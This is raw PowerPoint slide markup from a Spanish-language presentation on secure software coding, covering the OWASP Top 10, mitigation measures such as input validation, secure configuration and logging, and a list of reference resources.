                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D3E4E601-FE80-EB24-4BC9-F6E4226165D8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7578601" y="4977182"/>
            <a:ext cx="37100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latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>OWASP Top 10</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES">
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>, lista de los diez riesgos más críticos</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0">
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:endParaRPr lang="es-ES">
              <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="19" name="Imagen 18" descr="Interfaz de usuario gráfica, Icono&#10;&#10;Descripción generada automáticamente">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{57974989-DC43-D51D-8FC4-271E9DBD4013}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1091877" y="1292926"/>
            <a:ext cx="918270" cy="882141"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="21" name="Imagen 20">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4A2C53E7-6E30-B1D8-BFB2-D48EFFD415BF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1091877" y="3037090"/>
            <a:ext cx="918270" cy="929697"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="22" name="Imagen 21" descr="Icono&#10;&#10;Descripción generada automáticamente">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D05AF46E-72BC-F8F7-DE85-FD89EE092FF3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId6"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1091877" y="4948675"/>
            <a:ext cx="918270" cy="929696"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="23" name="Imagen 22" descr="Logotipo, Icono&#10;&#10;Descripción generada automáticamente">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F69F192F-3B99-A71B-21FF-775B535C6F2F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId7"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6300602" y="1323916"/>
            <a:ext cx="918271" cy="941586"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="27" name="Imagen 26" descr="Icono&#10;&#10;Descripción generada automáticamente">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2946EFF7-3DEE-91F5-BA2E-B3088B845714}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId8"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6300603" y="3086351"/>
            <a:ext cx="918270" cy="929696"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="28" name="Imagen 27" descr="Forma&#10;&#10;Descripción generada automáticamente">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A5B21A49-3D18-0F5A-BF86-F50BB9602652}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId9"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6312460" y="4929708"/>
            <a:ext cx="906376" cy="894031"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2" name="Imagen 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5C7374AB-0064-C8DB-E8B3-C2469CC5BD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spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="17936652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2886E-52D7-2AFF-F866-70DD1E1E958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685106B-833D-4A56-AC6B-BB6B9A602FDE}"/>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F72A968-22A3-E671-6A23-59FF10735D68}"/>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Principales medidas de mitigación codificación software</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="20" name="Imagen 19" descr="Texto&#10;&#10;El contenido generado por IA puede ser incorrecto.">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F899F0FE-BF56-3FE9-2C93-E3CA9A076E1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Marcador de posición de imagen 35">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3DD37B28-270E-89E6-E2EA-EEF4FF02DA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7655" b="20038"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="1484747"/>
            <a:ext cx="3557611" cy="4547229"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Rectángulo 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{812C8A09-BF3E-68C9-E292-D5760689BA89}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5349358" y="1394331"/>
            <a:ext cx="5834582" cy="392672"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="91440" tIns="45720" rIns="91440" bIns="45720" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-ES" sz="1800" b="1" kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Segoe UI"/>
              </a:rPr>
              <a:t>Requisitos</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1800" kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Segoe UI"/>
              </a:rPr>
              <a:t> de seguridad.</a:t>
            </a:r>
            <a:endParaRPr lang="es-ES" sz="1800" b="1" kern="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Segoe UI"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Rectángulo 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{635DAC3E-803E-D72B-D8D3-996D51E01EBE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5359631" y="2946055"/>
            <a:ext cx="5344043" cy="392672"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="91440" tIns="45720" rIns="91440" bIns="45720" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-ES" sz="1800" b="1" kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Segoe UI"/>
              </a:rPr>
              <a:t>Validación y filtrado de </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1800" kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Segoe UI"/>
              </a:rPr>
              <a:t>entradas y salidas.</a:t>
            </a:r>
            <a:endParaRPr lang="es-ES" sz="1800" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Rectangle 32">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5F1BCEBD-5061-50A3-BF33-56EA387D2272}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5349358" y="4534813"/>
            <a:ext cx="5530678" cy="394660"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="91440" tIns="45720" rIns="91440" bIns="45720" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-ES" sz="1800" kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Segoe UI"/>
              </a:rPr>
              <a:t>Uso de </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1800" b="1" kern="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Segoe UI"/>
              </a:rPr>
              <a:t>frameworks</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1800" b="1" kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Segoe UI"/>
              </a:rPr>
              <a:t> autorizados</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1800" kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Segoe UI"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:endParaRPr lang="es-ES" sz="1800" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Rectángulo 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1513CF0B-86F5-1E1A-2CC1-BCD10756E1B2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5349357" y="3793590"/>
            <a:ext cx="5834581" cy="392672"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="91440" tIns="45720" rIns="91440" bIns="45720" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-ES" sz="1800" kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Segoe UI"/>
              </a:rPr>
              <a:t>Gestión de </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1800" b="1" kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Segoe UI"/>
              </a:rPr>
              <a:t>errores y excepciones</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1800" kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Segoe UI"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:endParaRPr lang="es-ES" sz="1800" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Rectángulo 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{03C0845B-3217-3E99-2758-DFBCC7C249D9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5339083" y="5563727"/>
            <a:ext cx="5834581" cy="392672"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="91440" tIns="45720" rIns="91440" bIns="45720" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-ES" sz="1800" kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Segoe UI"/>
              </a:rPr>
              <a:t>Generación de </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1800" b="1" kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Segoe UI"/>
              </a:rPr>
              <a:t>registros</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1800" kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Segoe UI"/>
              </a:rPr>
              <a:t> (logs).</a:t>
            </a:r>
            <a:endParaRPr lang="es-ES" sz="1800" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Rectángulo 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F18FE506-7433-C18E-CC8C-71D4C650C26B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5341782" y="2147543"/>
            <a:ext cx="5834582" cy="392672"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="91440" tIns="45720" rIns="91440" bIns="45720" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-ES" sz="1800" b="1" kern="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Segoe UI"/>
              </a:rPr>
              <a:t>Configuraciones</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1800" kern="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Segoe UI"/>
              </a:rPr>
              <a:t> seguras.</a:t>
            </a:r>
            <a:endParaRPr lang="es-ES" sz="1800">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="12" name="Imagen 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C2CEABCB-3B1C-B3E6-5173-75FED2B967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pic>
        <p:nvPicPr>
          <p:cNvPr id="1026" name="Picture 2" descr="requisito ">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{01C03B96-4290-9A28-D453-F43332B08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0101" y="1313871"/>
            <a:ext cx="513890" cy="5138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ctualizacion del sistema ">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D5E6617C-427A-0917-481F-BD12185532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180" y="2081748"/>
            <a:ext cx="524262" cy="524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que ">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{860FE052-89C3-7E2E-7295-97B23B277C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5533" y="2851132"/>
            <a:ext cx="513890" cy="51389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292BB6FA-F2B7-16BE-2856-A28D59C71A10}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId9"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4590101" y="3711131"/>
            <a:ext cx="524262" cy="524262"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1032" name="Picture 8" descr="computadora ">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BBE94FA2-5163-5684-5057-89F6DA9D16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5533" y="4514645"/>
            <a:ext cx="513890" cy="51389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5AD837D8-2ECB-6214-EC6E-F5915DCE5A25}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId11"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4605533" y="5497931"/>
            <a:ext cx="524263" cy="524263"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="20888806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9A7E9-F750-D34F-2102-B53429E5A0B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38B5F26-999F-F0A2-4C88-22723972D5BE}"/>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7B6F43C-3807-920C-3D8A-D985C5875611}"/>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Recursos</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="20" name="Imagen 19" descr="Texto&#10;&#10;El contenido generado por IA puede ser incorrecto.">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{093F9363-796D-1BBF-FEC2-0FEC5443613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2" name="CuadroTexto 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{08169D76-BDD9-B8DF-1897-F4754CA54B72}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3871904" y="1278717"/>
            <a:ext cx="6556821" cy="487312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4"/>
              </a:rPr>
              <a:t>Auditoría</a:t>
            </a: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4"/>
              </a:rPr>
              <a:t> de </a:t>
            </a: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4"/>
              </a:rPr>
              <a:t>código</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s-E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5"/>
              </a:rPr>
              <a:t>Impacto económico de una inadecuada infraestructura</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6"/>
              </a:rPr>
              <a:t>Vocabulario</a:t>
            </a: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6"/>
              </a:rPr>
              <a:t> de </a:t>
            </a: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6"/>
              </a:rPr>
              <a:t>ciberseguridad</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7"/>
              </a:rPr>
              <a:t>Phishing</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8"/>
              </a:rPr>
              <a:t>Complejidad</a:t>
            </a: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8"/>
              </a:rPr>
              <a:t> </a:t>
            </a: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8"/>
              </a:rPr>
              <a:t>ciclomática</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9"/>
              </a:rPr>
              <a:t>Software Security. Building Security In</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0"/>
              </a:rPr>
              <a:t>Microsoft Security Development Lifecycle (SDL)</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i="1"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1"/>
              </a:rPr>
              <a:t>DevSecOps</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" i="1"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1"/>
              </a:rPr>
              <a:t> Guideline</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2"/>
              </a:rPr>
              <a:t>OWASP Top 10</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CCN-STIC-807 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="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Criptología</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="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 de </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="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empleo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="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 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="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en</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="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 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="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el</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="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 ENS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" kern="100" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>.</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err="1">
                <a:solidFill>
                  <a:srgbClr val="0563C1"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:hlinkClick r:id="rId14"/>
              </a:rPr>
              <a:t>IntruderPayloads</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" u="sng" kern="100" dirty="0">
              <a:solidFill>
                <a:srgbClr val="0563C1"/>
              </a:solidFill>
